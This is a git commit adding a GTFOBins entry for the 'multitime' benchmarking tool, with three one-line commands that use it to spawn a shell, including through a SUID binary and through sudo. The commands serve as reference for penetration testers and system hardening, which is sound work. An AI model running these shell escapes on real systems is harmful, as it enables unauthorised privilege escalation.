Add multitime

install: apt-get install -y multitime
manual: https://manpages.ubuntu.com/manpages/impish/man1/multitime.1.html
master
Miguel R 2022-06-22 14:13:44 +02:00 committed by Andrea Cardaci
parent 07a408d696
commit 7cc6a227da
1 changed files with 9 additions and 0 deletions

9
_gtfobins/multitime.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: multitime /bin/sh
suid:
- code: ./multitime /bin/sh -p
sudo:
- code: sudo multitime /bin/sh
---